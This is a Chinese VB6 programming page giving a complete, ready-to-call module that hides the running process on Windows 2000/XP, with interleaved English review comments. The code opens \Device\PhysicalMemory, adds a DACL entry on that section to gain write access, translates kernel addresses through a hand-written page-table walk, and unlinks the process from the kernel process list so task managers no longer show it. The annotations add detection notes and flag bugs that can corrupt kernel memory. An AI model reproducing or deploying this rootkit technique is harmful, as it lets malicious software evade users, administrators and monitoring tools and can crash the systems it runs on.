VB编写隐藏指定的EXE进程


VB隐藏进程

Form中的代码

' Form-side trigger. App.TaskVisible = False removes the application from the
' Windows task list; HideCurrentProcess (in module modHideProcess.bas below) then
' unlinks the process from the kernel's process list. The three statements were
' collapsed onto one line by the page; in the form they are separate lines
' (otherwise the first ' comment would swallow the Call).
Private Sub Command1_Click() App.TaskVisible = False '任务栏隐藏 Call HideCurrentProcess '进程隐藏 End Sub

新建一个模块,代码如下:


1. '-------------------------------------------------------------------------------------

2.

3. '模块名称:modHideProcess.bas

4.

5. '

6.

7. '模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程

8.

9. '

10.

11. '使用方法:直接调用 HideCurrentProcess()

12.

13. '

14.

15. '模块作者:检索自互联网,原作者不详。

16.

17. '

18.

19. '修改日期:2006/08/26

20.

21. '---------------------------------------------------------------------------------------

22.

23.

24.

25. Option Explicit

26.

27.

28.

' NTSTATUS codes compared against ZwOpenSection's return value. Only
' STATUS_ACCESS_DENIED is tested in this module; STATUS_INFO_LENGTH_MISMATCH,
' STATUS_INVALID_HandLE (casing apparently mangled by the page) and ERROR_SUCCESS
' are declared but never referenced.
29. Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004

30.

31. Private Const STATUS_ACCESS_DENIED = &HC0000022

32.

33. Private Const STATUS_INVALID_HandLE = &HC0000008

34.

35. Private Const ERROR_SUCCESS = 0&

36.

' Section-object access rights requested on \Device\PhysicalMemory (SECTION_MAP_*),
' the standard rights (READ_CONTROL, WRITE_DAC) used to re-open the section for
' DACL editing when the first open is refused, and the selector that limits
' Get/SetSecurityInfo to the DACL.
37. Private Const SECTION_MAP_WRITE = &H2

38.

39. Private Const SECTION_MAP_READ = &H4

40.

41. Private Const READ_CONTROL = &H20000

42.

43. Private Const WRITE_DAC = &H40000

44.

45. Private Const NO_INHERITANCE = 0

46.

47. Private Const DACL_SECURITY_INFORMATION = &H4

48.

49.

50.

' Native IO_STATUS_BLOCK; declared but not referenced by any routine in this module.
51. Private Type IO_STATUS_BLOCK

52.

53. Status As Long

54.

55. Information As Long

56.

57. End Type

58.

59.

60.

' Native counted string: Length/MaximumLength are byte counts, Buffer is a
' pointer to UTF-16 text. OpenPhysicalMemory fills it through RtlInitUnicodeString
' from a StrPtr() of a VB string.
61. Private Type UNICODE_STRING

62.

63. Length As Integer

64.

65. MaximumLength As Integer

66.

67. Buffer As Long

68.

69. End Type

70.

71.

72.

' OBJECT_ATTRIBUTES.Attributes flag values. None is used by this module:
' OpenPhysicalMemory sets Attributes.Attributes = 0.
73. Private Const OBJ_INHERIT = &H2

74.

75. Private Const OBJ_PERMANENT = &H10

76.

77. Private Const OBJ_EXCLUSIVE = &H20

78.

79. Private Const OBJ_CASE_INSENSITIVE = &H40

80.

81. Private Const OBJ_OPENIF = &H80

82.

83. Private Const OBJ_OPENLINK = &H100

84.

85. Private Const OBJ_KERNEL_HandLE = &H200

86.

87. Private Const OBJ_VALID_ATTRIBUTES = &H3F2

88.

89.

90.

' Native OBJECT_ATTRIBUTES handed to ZwOpenSection (six 32-bit fields, 24 bytes).
' The field spelled SecurityDeor here (and ppSecurityDeor in the GetSecurityInfo
' declare) is presumably SecurityDescriptor with the substring "script" stripped
' by the publishing site; the native side only sees the field's position, so the
' listing still compiles as long as both spellings agree.
91. Private Type OBJECT_ATTRIBUTES

92.

93. Length As Long

94.

95. RootDirectory As Long

96.

97. ObjectName As Long

98.

99. Attributes As Long

100.

101. SecurityDeor As Long

102.

103. SecurityQualityOfService As Long

104.

105. End Type

106.

107.

108.

' ACL header layout; declared but unused — the module only passes ACL pointers
' around as Long values.
109. Private Type ACL

110.

111. AclRevision As Byte

112.

113. Sbz1 As Byte

114.

115. AclSize As Integer

116.

117. AceCount As Integer

118.

119. Sbz2 As Integer

120.

121. End Type

122.

123.

124.

' Values for EXPLICIT_ACCESS.grfAccessMode; SetPhyscialMemorySectionCanBeWrited
' uses GRANT_ACCESS only.
125. Private Enum ACCESS_MODE

126.

127. NOT_USED_ACCESS

128.

129. GRANT_ACCESS

130.

131. SET_ACCESS

132.

133. DENY_ACCESS

134.

135. REVOKE_ACCESS

136.

137. SET_AUDIT_SUCCESS

138.

139. SET_AUDIT_FAILURE

140.

141. End Enum

142.

143.

144.

' TRUSTEE.MultipleTrusteeOperation values; the one caller leaves the field at its
' zero default (NO_MULTIPLE_TRUSTEE).
145. Private Enum MULTIPLE_TRUSTEE_OPERATION

146.

147. NO_MULTIPLE_TRUSTEE

148.

149. TRUSTEE_IS_IMPERSONATE

150.

151. End Enum

152.

153.

154.

' How TRUSTEE.ptstrName is interpreted; the module uses TRUSTEE_IS_NAME.
155. Private Enum TRUSTEE_FORM

156.

157. TRUSTEE_IS_SID

158.

159. TRUSTEE_IS_NAME

160.

161. End Enum

162.

163.

164.

' Account class of the trustee; the module uses TRUSTEE_IS_USER.
165. Private Enum TRUSTEE_TYPE

166.

167. TRUSTEE_IS_UNKNOWN

168.

169. TRUSTEE_IS_USER

170.

171. TRUSTEE_IS_GROUP

172.

173. End Enum

174.

175.

176.

' Trustee half of EXPLICIT_ACCESS. ptstrName is a VB String; since the enclosing
' UDT is passed to the A-suffixed SetEntriesInAclA, VB presumably converts the
' string to ANSI for the call, which is why the name is built with a trailing
' vbNullChar below.
177. Private Type TRUSTEE

178.

179. pMultipleTrustee As Long

180.

181. MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION

182.

183. TrusteeForm As TRUSTEE_FORM

184.

185. TrusteeType As TRUSTEE_TYPE

186.

187. ptstrName As String

188.

189. End Type

190.

191.

192.

' One access entry merged into a DACL by SetEntriesInAcl. The single instance
' built in SetPhyscialMemorySectionCanBeWrited grants SECTION_MAP_WRITE on the
' PhysicalMemory section to the current user.
193. Private Type EXPLICIT_ACCESS

194.

195. grfAccessPermissions As Long

196.

197. grfAccessMode As ACCESS_MODE

198.

199. grfInheritance As Long

200.

201. TRUSTEE As TRUSTEE

202.

203. End Type

204.

205.

206.

' Unused wrapper for an EXPLICIT_ACCESS array; SetEntriesInAcl is only ever
' called with a single entry.
207. Private Type AceArray

208.

209. List() As EXPLICIT_ACCESS

210.

211. End Type

212.

213.

214.

' Object classes for Get/SetSecurityInfo. The implicit numbering starting at 0
' makes SE_KERNEL_OBJECT = 6, which is how the section handle is described below.
215. Private Enum SE_OBJECT_TYPE

216.

217. SE_UNKNOWN_OBJECT_TYPE = 0

218.

219. SE_FILE_OBJECT

220.

221. SE_SERVICE

222.

223. SE_PRINTER

224.

225. SE_REGISTRY_KEY

226.

227. SE_LMSHARE

228.

229. SE_KERNEL_OBJECT

230.

231. SE_WINDOW_OBJECT

232.

233. SE_DS_OBJECT

234.

235. SE_DS_OBJECT_ALL

236.

237. SE_PROVIDER_DEFINED_OBJECT

238.

239. SE_WMIGUID_OBJECT

240.

241. End Enum

242.

243.

244.

' --- ACL editing (advapi32) ---
' GetSecurityInfo/SetSecurityInfo read and replace the section's DACL. The owner,
' group and SACL parameters are passed as dummies by the caller because only
' DACL_SECURITY_INFORMATION is ever requested.
245. Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long

246.

247. Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long

248.

249.

250.

' SetEntriesInAcl merges the EXPLICIT_ACCESS entries into a copy of OldAcl and
' returns the new ACL in NewAcl (released with LocalFree by the caller).
' BuildExplicitAccessWithName is declared but unused — the entry is filled by hand.
251. Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long

252.

253. Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)

254.

255.

256.

' --- Native API (ntdll) ---
' The user-mode open of \Device\PhysicalMemory is what the whole module depends
' on. On Windows 2000/XP an administrator could open it; from Windows Server 2003
' SP1 onward user-mode opens of this section are refused, so ZwOpenSection fails
' and the module does nothing.
257. Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)

258.

259. Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long

260.

' --- kernel32 ---
' LocalFree releases the buffers returned by the ACL functions; MapViewOfFile/
' UnmapViewOfFile map 4 KB windows of physical memory through the section;
' CopyMemory doubles as peek/poke (a ByVal argument is treated as a raw address);
' GetVersionEx selects the per-build constants.
' NOTE(review): UnmapViewOfFile is declared with lpBaseAddress ByRef, but every
' caller passes a Long variable, so the API receives the variable's address rather
' than the view base; the unmaps below presumably fail silently and the views
' stay mapped until the process exits.
261. Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long

262.

263. Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

264.

265. Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long

266.

267. Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long

268.

269. Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

270.

271. Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long

272.

273.

274.

' ANSI OSVERSIONINFO as expected by GetVersionExA; the fixed-length szCSDVersion
' keeps the structure its native size, and callers set dwOSVersionInfoSize =
' Len(verinfo) before the call. dwPlatformId = 2 with dwMajorVersion = 5 and
' dwMinorVersion 0 or 1 is how the module recognises Windows 2000 and XP.
275. Private Type OSVERSIONINFO

276.

277. dwOSVersionInfoSize As Long

278.

279. dwMajorVersion As Long

280.

281. dwMinorVersion As Long

282.

283. dwBuildNumber As Long

284.

285. dwPlatformId As Long

286.

287. szCSDVersion As String * 128

288.

289. End Type

290.

291.

292.

' Module state. verinfo is (re)filled by GetVersionEx in two routines; g_hNtDLL is
' never used; g_pMapPhysicalMemory holds the read-only view of the page-directory
' page set up by OpenPhysicalMemory; g_hMPM is the \Device\PhysicalMemory section
' handle; aByte is a 4-byte scratch buffer LinearToPhys uses to reinterpret a
' Long as an unsigned value.
293. Private verinfo As OSVERSIONINFO

294.

295.

296.

297. Private g_hNtDLL As Long

298.

299. Private g_pMapPhysicalMemory As Long

300.

301. Private g_hMPM As Long

302.

303. Private aByte(3) As Byte

304.

305.

306.

' Hides the current process by direct kernel object manipulation. Every process
' object is linked into a doubly-linked kernel list (presumably the per-process
' ActiveProcessLinks entry on these builds); this routine reads the current
' thread and process pointers through \Device\PhysicalMemory and relinks the two
' neighbours around this process, so enumerators that walk the list no longer
' report it. The process keeps running and still owns its PID, handles, threads
' and image.
'
' Scope: Windows 2000 (5.0) and XP (5.1) on 32-bit x86 without PAE only, because
' every offset and physical address below is hard-coded for those kernels, and
' only from an account that can open or re-ACL \Device\PhysicalMemory (see
' OpenPhysicalMemory). Defensive view: the gap shows up in any cross-view
' comparison (list walk versus PID table, handle enumeration or scheduler
' structures) and in memory-forensics list-integrity checks; the section open
' and the DACL change are themselves auditable events.
' NOTE(review): on a build that is not 5.0/5.1 the offsets stay 0 and, if the
' open still succeeded, the two SetData calls patch the first eight bytes of the
' process object instead of its list links — kernel memory corruption rather
' than a clean failure. lOffsetPID is assigned but never read.
307. Public Sub HideCurrentProcess()

308.

309. ' Hides the current application's process from the process list

310.

311.

312.

313. Dim thread As Long, process As Long, fw As Long, bw As Long

314.

315. Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

316.

317.

318.

' GetVersionExA requires the size field to be set before the call.
319. verinfo.dwOSVersionInfoSize = Len(verinfo)

320.

321. If (GetVersionEx(verinfo)) <>0 Then

322.

' dwPlatformId 2 = Windows NT family; major version 5 = 2000 / XP.
323. If verinfo.dwPlatformId = 2 Then

324.

325. If verinfo.dwMajorVersion = 5 Then

326.

327. Select Case verinfo.dwMinorVersion

328.

' Windows 2000: offsets of the list Flink/Blink and the PID inside the process object.
329. Case 0

330.

331. lOffsetFlink = &HA0

332.

333. lOffsetBlink = &HA4

334.

335. lOffsetPID = &H9C

336.

' Windows XP: same fields at different offsets.
337. Case 1

338.

339. lOffsetFlink = &H88

340.

341. lOffsetBlink = &H8C

342.

343. lOffsetPID = &H84

344.

345. End Select

346.

347. End If

348.

349. End If

350.

351. End If

352.

353.

354.

' OpenPhysicalMemory returns the section handle (nonzero) only when the page
' directory page could be mapped.
355. If OpenPhysicalMemory <>0 Then

356.

' Current-thread pointer read from the processor control region; 0xFFDFF000 is its
' fixed x86 address on these builds and 0x124 the current-thread slot (presumably).
357. thread = GetData(&HFFDFF124)

358.

' Owning-process pointer taken from the thread object.
359. process = GetData(thread + &H44)

360.

' Forward and backward neighbours in the process list.
361. fw = GetData(process + lOffsetFlink)

362.

363. bw = GetData(process + lOffsetBlink)

364.

' next.Blink = prev (fw + 4 is the Blink field of the next entry).
365. SetData fw + 4, bw

366.

' prev.Flink = next. This process's own links are left pointing at its neighbours.
367. SetData bw, fw

368.

' Closes the section handle; the view in g_pMapPhysicalMemory is never unmapped.
369. CloseHandle g_hMPM

370.

371. End If

372.

373. End Sub

374.

375.

376.

' Widens the DACL on the PhysicalMemory section so the current user is granted
' SECTION_MAP_WRITE; called by OpenPhysicalMemory when the read/write open is
' refused. It needs a handle opened with READ_CONTROL Or WRITE_DAC, i.e. an
' account that may already rewrite the object's security (an administrator on
' 2000/XP). From a monitoring standpoint a DACL change on this section is a
' strong signal of exactly this kind of tampering.
' NOTE(review): every API return value is ignored (dwRes is unused), so a failed
' GetSecurityInfo or SetEntriesInAcl leaves pNewDacl = 0 and SetSecurityInfo is
' still called with it, which is not the intended ACL; "CleanUp:" is a label that
' no On Error or GoTo references.
377. Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)

378.

379. Dim pDacl As Long

380.

381. Dim pNewDacl As Long

382.

383. Dim pSD As Long

384.

385. Dim dwRes As Long

386.

387. Dim ea As EXPLICIT_ACCESS

388.

389.

390.

' Fetch the current DACL; pSD receives the descriptor buffer, pDacl points into it.
391. GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD

392.

393.

394.

' One GRANT entry: SECTION_MAP_WRITE, no inheritance, for the name "CURRENT_USER"
' (presumably the special trustee name the ACL editing API resolves to the
' calling user). The trailing vbNullChar terminates the ANSI string.
395. ea.grfAccessPermissions = SECTION_MAP_WRITE

396.

397. ea.grfAccessMode = GRANT_ACCESS

398.

399. ea.grfInheritance = NO_INHERITANCE

400.

401. ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME

402.

403. ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER

404.

405. ea.TRUSTEE.ptstrName = "CURRENT_USER" &vbNullChar

406.

407.

408.

' New DACL = old DACL plus the entry; pNewDacl receives a buffer to LocalFree.
409. SetEntriesInAcl 1, ea, pDacl, pNewDacl

410.

411.

412.

' Write the merged DACL back (ByVal: pass the pointer value, not its address).
413. SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0

414.

415.

416.

417. CleanUp:

418.

' Release both API-allocated buffers.
419. LocalFree pSD

420.

421. LocalFree pNewDacl

422.

423. End Sub

424.

425.

426.

' Opens the \Device\PhysicalMemory section read/write and maps the 4 KB page that
' holds the kernel's page directory into g_pMapPhysicalMemory, which LinearToPhys
' walks afterwards. Returns the section handle (g_hMPM) on success, 0 otherwise.
' On Windows 2000/XP the open is allowed for administrators; if it is refused, the
' routine re-opens the section for security editing, adds a write ACE for the
' current user, closes and retries. On Windows Server 2003 SP1 and later user-mode
' opens of this section are refused outright, so the function returns 0 and the
' rest of the module never runs.
' NOTE(review): Status after the READ_CONTROL Or WRITE_DAC open is not checked
' before SetPhyscialMemorySectionCanBeWrited is called; lDirectoty stays 0 on an
' unrecognised build, so physical page 0 would then be mapped as the page
' directory; the version probe duplicates the one in HideCurrentProcess.
427. Private Function OpenPhysicalMemory() As Long

428.

429. Dim Status As Long

430.

431. Dim PhysmemString As UNICODE_STRING

432.

433. Dim Attributes As OBJECT_ATTRIBUTES

434.

435.

436.

' Counted string built over the VB string's UTF-16 buffer (StrPtr).
437. RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")

438.

439. Attributes.Length = Len(Attributes)

440.

441. Attributes.RootDirectory = 0

442.

443. Attributes.ObjectName = VarPtr(PhysmemString)

444.

445. Attributes.Attributes = 0

446.

447. Attributes.SecurityDeor = 0

448.

449. Attributes.SecurityQualityOfService = 0

450.

451.

452.

' First attempt: read + write mapping rights on the section.
453. Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)

454.

' Access denied: reopen just for security editing, add the write ACE, close, retry.
455. If Status = STATUS_ACCESS_DENIED Then

456.

457. Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)

458.

459. SetPhyscialMemorySectionCanBeWrited g_hMPM

460.

461. CloseHandle g_hMPM

462.

463. Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)

464.

465. End If

466.

467.

468.

' Physical address of the kernel page directory on these (non-PAE) builds, as
' hard-coded here: 0x30000 on Windows 2000, 0x39000 on Windows XP.
469. Dim lDirectoty As Long

470.

471. verinfo.dwOSVersionInfoSize = Len(verinfo)

472.

473. If (GetVersionEx(verinfo)) <>0 Then

474.

475. If verinfo.dwPlatformId = 2 Then

476.

477. If verinfo.dwMajorVersion = 5 Then

478.

479. Select Case verinfo.dwMinorVersion

480.

481. Case 0

482.

483. lDirectoty = &H30000

484.

485. Case 1

486.

487. lDirectoty = &H39000

488.

489. End Select

490.

491. End If

492.

493. End If

494.

495. End If

496.

497.

498.

' Status = 0 is STATUS_SUCCESS: the section is open read/write.
499. If Status = 0 Then

500.

' dwDesiredAccess 4 = SECTION_MAP_READ: a read-only view of one page starting at
' the directory's physical offset.
501. g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)

502.

' Only report success once the directory page is actually mapped.
503. If g_pMapPhysicalMemory <>0 Then OpenPhysicalMemory = g_hMPM

504.

505. End If

506.

507. End Function

508.

509.

510.

' Translates a kernel virtual address into a physical address by walking the
' 32-bit two-level x86 page tables by hand, starting from the page-directory view
' in BaseAddress (g_pMapPhysicalMemory). Returns 0 when the directory entry or
' the table entry is not present.
'   bits 31..22 of addr -> index into the page directory (PGDE)
'   PGDE bit 0          -> present; PGDE bit 7 (&H80) -> 4 MB page
'   bits 21..12 of addr -> index into the page table mapped from PGDE (PTE)
'   bits 11..0 of addr  -> offset inside the 4 KB page
' Only valid for non-PAE kernels: with PAE the entries are 8 bytes wide and there
' is an extra level, so this walk reads the wrong words.
' NOTE(review): MapViewOfFile's result is not checked before the PTE read, and the
' page-table view is unmapped only on the present path (see also the ByRef
' UnmapViewOfFile declare); BaseAddress and addr are ByRef but never written.
511. Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long

512.

513. Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long

514.

515. Dim lTemp As Long

516.

517.

518.

519. VAddr = addr

520.

' Reinterpret the Long as unsigned via a byte copy, then take the top 10 bits:
' VB6 has no shift operator and a signed divide would go wrong for addresses
' at or above 0x80000000.
521. CopyMemory aByte(0), VAddr, 4

522.

523. lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))

524.

525.

526.

' Address of the directory entry inside the mapped page, then the entry itself
' (CopyMemory with a ByVal source reads 4 bytes from that raw address).
527. PGDE = BaseAddress + lTemp * 4

528.

529. CopyMemory PGDE, ByVal PGDE, 4

530.

531.

532.

533. If (PGDE And 1) <>0 Then

534.

535. lTemp = PGDE And &H80

536.

537. If lTemp <>0 Then

538.

' 4 MB page: physical = entry frame (bits 31..22) + low 22 bits of the address.
539. PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)

540.

541. Else

542.

' Map the page table (entry with its flag bits masked off) and read the 4-byte
' table entry selected by bits 21..12.
543. PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)

544.

545. lTemp = (VAddr And &H3FF000) / (2 ^ 12)

546.

547. PTE = PGDE + lTemp * 4

548.

549. CopyMemory PTE, ByVal PTE, 4

550.

551.

552.

553. If (PTE And 1) <>0 Then

554.

' 4 KB page: physical = table frame (bits 31..12) + low 12 bits of the address.
555. PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)

556.

557. UnmapViewOfFile PGDE

558.

559. End If

560.

561. End If

562.

563. End If

564.

565.

566.

567. LinearToPhys = PAddr

568.

569. End Function

570.

571.

572.

' Reads the 4-byte value at kernel virtual address addr: translate to physical,
' map the containing 4 KB physical page read-only, copy the word at the page
' offset, unmap, return it. Returns 0 when the mapping fails, which callers
' cannot distinguish from a genuine 0 (HideCurrentProcess chains further GetData
' calls on the result without checking).
573. Private Function GetData(addr As Long) As Long

574.

575. Dim phys As Long, tmp As Long, ret As Long

576.

577.

578.

579. phys = LinearToPhys(g_pMapPhysicalMemory, addr)

580.

' dwDesiredAccess 4 = SECTION_MAP_READ; map the page that contains phys.
581. tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)

582.

583. If tmp <>0 Then

584.

' ((phys And &HFFF) / 4) * 4 is just the page offset again (the division is exact
' in Double); it only looks like an alignment step.
585. ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4

586.

' Read the word through the view into ret (ByVal source = raw address).
587. CopyMemory ret, ByVal ret, 4

588.

589.

590.

591. UnmapViewOfFile tmp

592.

593. GetData = ret

594.

595. End If

596.

597. End Function

598.

599.

600.

' Writes the 4-byte value data at kernel virtual address addr through a
' SECTION_MAP_WRITE view of the containing physical page. Returns True only when
' the page could be mapped; HideCurrentProcess ignores the result, so a failed
' second write would leave the process list only half relinked.
601. Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean

602.

603. Dim phys As Long, tmp As Long, x As Long

604.

605.

606.

607. phys = LinearToPhys(g_pMapPhysicalMemory, addr)

608.

' Writable view of the page that contains phys.
609. tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)

610.

611. If tmp <>0 Then

612.

' Same offset computation as GetData: x = view base + page offset.
613. x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4

614.

' Poke: the ByVal destination makes x the raw target address.
615. CopyMemory ByVal x, data, 4

616.

617.

618.

619. UnmapViewOfFile tmp

620.

621. SetData = True

622.

623. End If

624.

625. End Function

626.

627.

628.

' Little-endian conversion of four bytes into an unsigned 32-bit value. The result
' is a Double because a VB6 Long cannot hold values above 2^31-1 without raising
' an overflow error; LinearToPhys relies on this to treat kernel addresses
' (>= 0x80000000) as unsigned. Only inByte(0..3) are read.
629. Private Function ByteArrToLong(inByte() As Byte) As Double

630.

631. Dim I As Integer

632.

633. For I = 0 To 3

634.

' Byte I contributes inByte(I) * 256^I.
635. ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)

636.

637. Next I

638.

639. End Function

